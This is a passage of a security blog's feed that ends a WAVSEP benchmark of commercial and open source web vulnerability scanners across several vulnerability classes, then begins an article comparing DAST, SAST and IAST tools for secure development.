&lt;br /&gt;
The following table presents the&lt;b&gt; Path Traversal&lt;/b&gt; detection / false-positive ratio of open source DAST vendors:&lt;br /&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan; font-size: small;&quot;&gt;Path Traversal Benchmark - Open Source Vendors - Click to Enlarge&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLzKxein8skzOtSS47z2X44LeC9eWwE_f3aJlFa5LmhEWXSWeht4ru3D9TODx5JV1dTBGqOio7x3qZJXdYUrqNVCcJvzRwCR-0X_m5DzKQfcP5ei2Vk5OMWBnlw_Ib4CSu5ssXc_XzOHQ/s1600/Traversal-OpenSource.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLzKxein8skzOtSS47z2X44LeC9eWwE_f3aJlFa5LmhEWXSWeht4ru3D9TODx5JV1dTBGqOio7x3qZJXdYUrqNVCcJvzRwCR-0X_m5DzKQfcP5ei2Vk5OMWBnlw_Ib4CSu5ssXc_XzOHQ/s640/Traversal-OpenSource.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;*&lt;/b&gt; due to incomplete QA processes on our behalf, the results of &lt;b&gt;WATOBO&lt;/b&gt; and &lt;b&gt;arachni&lt;/b&gt; may require an update in the next few weeks. &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h3&gt;
&lt;b&gt;3.7 The Detection Ratio of SQL Injection (Update)&lt;/b&gt;&lt;/h3&gt;
&lt;h3&gt;
&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/h3&gt;
The evaluation used the same SQL injection test-bed used in the previous 
benchmarks, which cover GET and POST input delivery vectors in 136 valid test 
cases, and 10 false positive categories. Load related issues may have slightly affected results (a typical problem with sql injection scanning due to time based plugins / connection pool issues), but the overall results remain intact.&lt;br /&gt;
&lt;br /&gt;
The following table presents the SQL Injection detection / false-positive ratio of commercial DAST vendors:&lt;br /&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan; font-size: small;&quot;&gt;SQL Injection Benchmark - Commercial Vendors - Click to Enlarge&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG4Ow8JGMV1IL3EnXYKZGGcWfMSPnihAb3HWjmf4emozFiLTjA52L9yPVhNdx-Gv26vwAea6on0PFjFgEPgYod_T4GTh1RGOCr4w6uLBp1froJpnW1M6EVRm8T2TW7Di7m8eOkvxpPfhQ/s1600/SQL-Injection-Commercial.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG4Ow8JGMV1IL3EnXYKZGGcWfMSPnihAb3HWjmf4emozFiLTjA52L9yPVhNdx-Gv26vwAea6on0PFjFgEPgYod_T4GTh1RGOCr4w6uLBp1froJpnW1M6EVRm8T2TW7Di7m8eOkvxpPfhQ/s640/SQL-Injection-Commercial.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;
The following table presents the SQL Injection detection / false-positive ratio of open source DAST projects:&lt;br /&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan; font-size: small;&quot;&gt;SQL Injection Benchmark - Open Source Vendors - Click to Enlarge&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIdAY32bbYW2W3tmJPIKRKkNjF5Audf5rIE_Me7jD5Og_OAI0b4oMPXxtClkPpIqdRvWJZiFVQJKM_un8W2CJ5Oa9Im9cfOqR68ZR0DTj221i5vZU7bvHMYaB4zgjWUQySe1GMIggjXh8/s1600/SQLi-OpenSource.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIdAY32bbYW2W3tmJPIKRKkNjF5Audf5rIE_Me7jD5Og_OAI0b4oMPXxtClkPpIqdRvWJZiFVQJKM_un8W2CJ5Oa9Im9cfOqR68ZR0DTj221i5vZU7bvHMYaB4zgjWUQySe1GMIggjXh8/s640/SQLi-OpenSource.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;* &lt;b&gt;ZAP &lt;/b&gt;vanilla installation gets about 75% detection, as opposed to the high result of previous benchmarks, and only yielded a result similar to previous benchmarks &lt;b&gt;after&lt;/b&gt; installing the beta/alpha active scan plugins and configuring Low/Insane detection ratios. these additional plugins also seem to yield a significant amount of false positives. &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h3&gt;
&lt;b&gt;3.8 The Detection Ratio of Reflected Cross Site Scripting (Update)&lt;/b&gt;&lt;/h3&gt;
&lt;h3&gt;
&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/h3&gt;
The evaluation used the same XSS test-bed used in the previous benchmarks, which cover GET and POST input delivery vectors in 66 valid test cases, and 7 false positive categories.&lt;br /&gt;
&lt;br /&gt;
The following table presents the XSS detection / false-positive ratio of commercial DAST vendors:&lt;br /&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan; font-size: small;&quot;&gt;Reflected XSS Benchmark - Commercial Vendors - Click to Enlarge&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhn5r8IdLT6c4cXGcRRYLQEtkxjlsDmtUon1Et52mDLVwoy3Bosz47gE1JRiLB82nsqvvHMxEfV8H-0wMu0rD7BqRhkSJvpHrzMw9XIpyLd0YhPJK0rUji5J62gr3iW0C6AhWE13JWaexU/s1600/XSS-Commercial.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhn5r8IdLT6c4cXGcRRYLQEtkxjlsDmtUon1Et52mDLVwoy3Bosz47gE1JRiLB82nsqvvHMxEfV8H-0wMu0rD7BqRhkSJvpHrzMw9XIpyLd0YhPJK0rUji5J62gr3iW0C6AhWE13JWaexU/s640/XSS-Commercial.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
The following table presents the XSS detection / false-positive ratio of open source DAST projects:&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan; font-size: small;&quot;&gt;Reflected XSS Benchmark - Open Source Vendors - Click to Enlarge&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUdjiziAcoCmxd1Db9ryt7roMlNV8g-qeQQ3f24eM6oeMX6YOj6k5t82qc2jSC_17-WMIUwohZpc4tmBsIMpetskZ_LXKCOhycztSqvLO6xNX_7HdaKopGiGzqHIwcXxqoTh1LFE-82vo/s1600/XSS-OpenSource.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUdjiziAcoCmxd1Db9ryt7roMlNV8g-qeQQ3f24eM6oeMX6YOj6k5t82qc2jSC_17-WMIUwohZpc4tmBsIMpetskZ_LXKCOhycztSqvLO6xNX_7HdaKopGiGzqHIwcXxqoTh1LFE-82vo/s640/XSS-OpenSource.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;* &lt;b&gt;arachni&lt;/b&gt;&#39;s &quot;imperfect&quot; score seems to be intentional - since the project removed support for VBscript related XSS tests due to their lack of relevance to modern browsers and modern websites. the only test cases currently missed by the project are VBScript XSS test cases.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h3&gt;
&lt;b&gt;3.9 The Detection Ratio of Unvalidated Redirect (Update)&lt;/b&gt;&lt;/h3&gt;
&lt;br /&gt;
The evaluation used the same unvalidated-redirect test-bed used in the previous 
benchmarks, and focused only on GET input delivery vectors in total of 30 valid test cases, and 9 false positive categories (vulnerable unvaliataed redirect POST entry points only contribute to phishing credibility in indirect session-storing/multi-phase scenarios, and these were not covered in the benchmark).&lt;br /&gt;
&lt;br /&gt;
The following table presents the unvalidated redirect detection / false-positive ratio of commercial DAST vendors:&lt;br /&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&amp;nbsp;
&lt;span style=&quot;color: cyan; font-size: small;&quot;&gt;Unvalidated Redirect Benchmark - Commercial Vendors - Click to Enlarge&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisbfGYci4sYqPz1dyoHpbUKu961wB0RWw9RU7ffOx3ZvwAAF6rSS3iwUCyxPGE4PJTmifVTRtqiy1_TgBpk6G1IQtyEK_XgMCxuXUtHZ6g5rUinqlrGvePQL3vVYnU_cinn4ETBtBHjOs/s1600/Redirect-Commercial.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisbfGYci4sYqPz1dyoHpbUKu961wB0RWw9RU7ffOx3ZvwAAF6rSS3iwUCyxPGE4PJTmifVTRtqiy1_TgBpk6G1IQtyEK_XgMCxuXUtHZ6g5rUinqlrGvePQL3vVYnU_cinn4ETBtBHjOs/s640/Redirect-Commercial.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;* The results of &lt;b&gt;appscan &lt;span style=&quot;color: red;&quot;&gt;&lt;u&gt;DO NOT REFLECT&lt;/u&gt;&lt;/span&gt;&lt;/b&gt; the latest version of the product - which is still under evaluation. they have already proclaimed that they have drastically improved the result from the previous version.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
The following table presents the unvalidated redirect detection / false-positive ratio of open source DAST projects:&lt;br /&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;/h3&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan; font-size: small;&quot;&gt;Unvalidated Redirect Benchmark - Open Source Vendors - Click to Enlarge&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg84q9arFCGchyN6Ibembip2DoBE3kVBwzP7utbe0FjNyly-SKmmu4kiJ71FuuM59CEH5i5u13d_jxqgUFviKRv2bqtmbffjmNzLSQgYfYWA3isucSyxB57uUeA8I00slCpYPdHHxqxxb8/s1600/Redirect-OpenSource.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg84q9arFCGchyN6Ibembip2DoBE3kVBwzP7utbe0FjNyly-SKmmu4kiJ71FuuM59CEH5i5u13d_jxqgUFviKRv2bqtmbffjmNzLSQgYfYWA3isucSyxB57uUeA8I00slCpYPdHHxqxxb8/s640/Redirect-OpenSource.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h3&gt;
&lt;b&gt;3.10 The Detection Ratio of Backup/Hidden Files (Update)&lt;/b&gt;&lt;/h3&gt;
&lt;br /&gt;
The backup file results will be published in the upcoming weeks, due to vendor specific-bugs, licensing issues and time-frame constraints.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;</content><link rel='replies' type='application/atom+xml' href='http://sectooladdict.blogspot.com/feeds/7339223271228712338/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://sectooladdict.blogspot.com/2017/11/wavsep-2017-evaluating-dast-against.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/7339223271228712338'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/7339223271228712338'/><link rel='alternate' type='text/html' href='http://sectooladdict.blogspot.com/2017/11/wavsep-2017-evaluating-dast-against.html' title='WAVSEP 2017/2018 - Evaluating DAST against PT/SDL Challenges'/><author><name>Shay Chen</name><uri>http://www.blogger.com/profile/16490521389991462247</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9QLJKh4Z6I4puwxVoOzyuqVc4ZRYmL_XcS3dLCeIsRcdoEmwnZQejnW8__iitHgbTYcmCefW7UEtQPpZdbtqX0cnPCYn7Ws913obv19u44x89xHY8a-9JqfkdxyBXg/s220/n847114298_305931_3159.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrNytJzf1oL2PMVUAgxqATdBJVe15LjRvK4BkCqinzzm3HnwLTMsBa0tD3YA4RKtZyNfVw69A0QIECwOHOI8dsrstdD6APMxdsmt5edN2OG9bwRzbNiujd-n4WNvWZwHap91uTBX_AEEU/s72-c/EffectiveSecurityLogo001_1000pxWide.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3792178847867987053.post-7054206218230512514</id><published>2017-05-01T09:26:00.000-07:00</published><updated>2017-06-19T09:10:53.201-07:00</updated><title type='text'>DAST vs. SAST vs. IAST - Modern SSLDC Guide - Part I</title><content type='html'>&lt;br /&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;background: gray; border: solid windowtext 1.0pt; mso-background-themecolor: background1; mso-background-themeshade: 128; mso-border-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 467.5pt;&quot; valign=&quot;top&quot; width=&quot;623&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;&lt;u&gt;Disclaimer&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
This article uses a &lt;b&gt;relative&lt;/b&gt; ratio for the various charts, to emphasize the ups and downs of various
  technologies to the reader. It also reflects the current situation to date
  (which may change as technologies mature), and relies on generalization’s and
  estimations on capabilities of technologies, and so, must be read in the
  proper context.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Using a variety of vulnerability detection solutions have become widespread in software development projects, with the aim of detecting crucial vulnerabilities as early as possible.&lt;br /&gt;
&lt;br /&gt;
The vast collection of technologies and tool-sets available to address the issue can dazzle even an expert, raising questions such as -&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;The engimous&lt;/span&gt;&lt;span style=&quot;font-size: large;&quot;&gt; &quot;&lt;b&gt;Which technology is the best ?&lt;/b&gt;&quot;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;The intriguing &lt;/span&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&quot;&lt;b&gt;Do DAST/SAST/IAST &lt;span style=&quot;color: lime;&quot;&gt;complement&lt;/span&gt;&amp;nbsp;or &lt;span style=&quot;color: red;&quot;&gt;supersede&lt;/span&gt; each other ?&lt;/b&gt;&quot;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;And the inevitable&lt;/span&gt;&lt;span style=&quot;font-size: large;&quot;&gt; &quot;&lt;b&gt;How to prioritize their usage and acquisition ?&lt;/b&gt;&lt;/span&gt;&quot;&lt;/div&gt;
&lt;br /&gt;
With the upcoming publication of the &lt;b&gt;WAVSEP 2017
benchmark&lt;/b&gt; close at hand, I wanted to take the opportunity to provide my
take on the role of &lt;b&gt;DAST&lt;/b&gt; tools within the &amp;nbsp;context of prominent&amp;nbsp;technologies and trends in the
field.&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;Where &lt;/b&gt;do they fit in? &lt;b&gt;What &lt;/b&gt;do they &lt;b&gt;excel &lt;/b&gt;in (compared to alternatives)?
&lt;b&gt;When &lt;/b&gt;should we&amp;nbsp;use them?&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
With the introduction and maturity of new
vulnerability-detection technologies (&lt;b&gt;IAST&lt;/b&gt;/&lt;b&gt;DAST&lt;/b&gt;/&lt;b&gt;SAST&lt;/b&gt;/&lt;b&gt;HYBRID&lt;/b&gt;/&lt;b&gt;OSS&lt;/b&gt;), and the expected
streamline of (understandably) conflicting vendor claims, users may find it
hard to discern which technologies may fit their needs, how to &lt;span style=&quot;color: cyan;&quot;&gt;&lt;b&gt;PRIORITISE&lt;/b&gt;
&lt;/span&gt;their acquisition/integration, and when’s the right time to engage each
solution category.&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
In the following article, I will be covering a few of the key
aspects in the integration of these toolsets into an SSDLC (secure software
development life cycle) environment – the &lt;b&gt;&lt;u&gt;OVERALL&lt;/u&gt; &lt;u&gt;EFFORT&lt;/u&gt;&lt;/b&gt;
and the &lt;b&gt;&lt;u&gt;IDEAL&lt;/u&gt; &lt;u&gt;TIMING&lt;/u&gt; &lt;/b&gt;of each solution category, and the benefit of &lt;b&gt;&lt;u&gt;SUPPORTED TECHNOLOGIES&lt;/u&gt;&lt;/b&gt; and &lt;b&gt;&lt;u&gt;CODE COVERAGE&lt;/u&gt;&lt;/b&gt; they provide under different cirucmstances.&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;
&lt;br /&gt;
In addition to being exposed to a wide variaty of tools-of-the-trade, the article can also help the reader answer some basic questions when evaluating any one of these tools.&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
For those of us who somehow managed to escape the terms
currently in use – this article covers the following technologies:&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;1) DAST&lt;/b&gt; – Dynamic Application Security Testing – Generic
and Known Web Application Vulnerability Scanners that analyze a live
application instance for security vulnerabilities. To further clarify – this is
the category of tools that was covered in all the previous WAVSEP benchmarks.&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;This article specifically focuses on DAST solutions which are actively maintained and/or SSDLC adapted, with the ability to verify potential vulnerabiliteis through some sort of &lt;b&gt;Exploitation/Verification process &lt;/b&gt;(referred to as EV for the purposes of the article), either external or in built into the detection algorithm, as &lt;b&gt;opposed &lt;/b&gt;to &quot;fuzzer&quot; like tools based primarly on algorithms that rely on identifying specific keywords in the response.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAPJA0MW1LBZVIJDplTBArYgxoBgPVD8wmiOS_Vf-0IJooCEoZ8PBhq2I9yOyNakCIxCS5G7irANlbp71CztoLz3k1uhKaeQrTfYfvOYV_qHXOVNspk6fQzh_2GT39ppZIyLlVaXSnBpc/s1600/DAST-Tools.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;118&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAPJA0MW1LBZVIJDplTBArYgxoBgPVD8wmiOS_Vf-0IJooCEoZ8PBhq2I9yOyNakCIxCS5G7irANlbp71CztoLz3k1uhKaeQrTfYfvOYV_qHXOVNspk6fQzh_2GT39ppZIyLlVaXSnBpc/s640/DAST-Tools.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;2) SAST &lt;/b&gt;– Static Application Security Testing –
Generic &amp;amp; Known Application Vulnerability Code-Level Scanners that analyze
source code and application configuration files for security vulnerabilities.&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpFirst&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX7f_meKlfJWahnBCa_gvl4dxA5zdusOcyPBVOn8Wd4HFbwy1JTrHJHDB_F6_TgjYH62yvFq4XGJWH_dYXRZNTsBnqt5Et4F7rHX9I8Tg6TUHuGUwpFlssLNgGq_q9cCQ0HLr3jl9k61s/s1600/SAST-Tools.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;146&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX7f_meKlfJWahnBCa_gvl4dxA5zdusOcyPBVOn8Wd4HFbwy1JTrHJHDB_F6_TgjYH62yvFq4XGJWH_dYXRZNTsBnqt5Et4F7rHX9I8Tg6TUHuGUwpFlssLNgGq_q9cCQ0HLr3jl9k61s/s640/SAST-Tools.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpLast&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;3) IAST &lt;/b&gt;– Interactive Application Security Testing –
Generic and Known Application Vulnerability Debug/Memory Level Analysis
Solutions that attempt to identify vulnerabilities on live application
instances while also analyzing code structures in the memory and tracking the
input flow throughout the application sections. This category is further
divided into the following subcategories:&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;Passive IAST &lt;/b&gt;– IAST solutions that rely on traffic
already being generated to identify potentially vulnerable sections, WITHOUT
performing additional attack/exploit verifications (e.g. sending input with all
the necessary exploitation characters, etc).&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Active IAST &lt;/b&gt;– IAST solutions that verify potential
vulnerability sinks/sources through the use of requests that verify the actual
exploitability of the potential vulnerability (again, by issuing requests that
contain input with all the necessary exploitation characters, or through
similar means).&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDtlhcoa8_0YjTl85dbdbX4amWauOlTi0WvTDt5-pBLYWZfF5EZwlVkeH7QW-kOkXNbOAwDxjvTBgm5RB1BWaFsSeOBG0nDOkcpVdbdIlrQXiR3p4x4w9iw69pFl8pD30f6IfyYQPPVSQ/s1600/IAST.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;150&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDtlhcoa8_0YjTl85dbdbX4amWauOlTi0WvTDt5-pBLYWZfF5EZwlVkeH7QW-kOkXNbOAwDxjvTBgm5RB1BWaFsSeOBG0nDOkcpVdbdIlrQXiR3p4x4w9iw69pFl8pD30f6IfyYQPPVSQ/s640/IAST.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;o:p&gt;&lt;/o:p&gt;

&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;4) OSS&lt;/b&gt; - &lt;b&gt;Open Source Security&lt;/b&gt; – the SAST
equivalent of the mythological CGI-scanner – these solutions that were, for the
purposes of &lt;b&gt;this&lt;/b&gt; article, integrated into the category of SAST, due to
similarity of the &lt;b&gt;chart positioning&lt;/b&gt; and role, although these solutions operate
in an entirely different manner, and focus only on the identification of “known”
vulnerabilities in 3&lt;sup&gt;rd&lt;/sup&gt; party libraries.&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
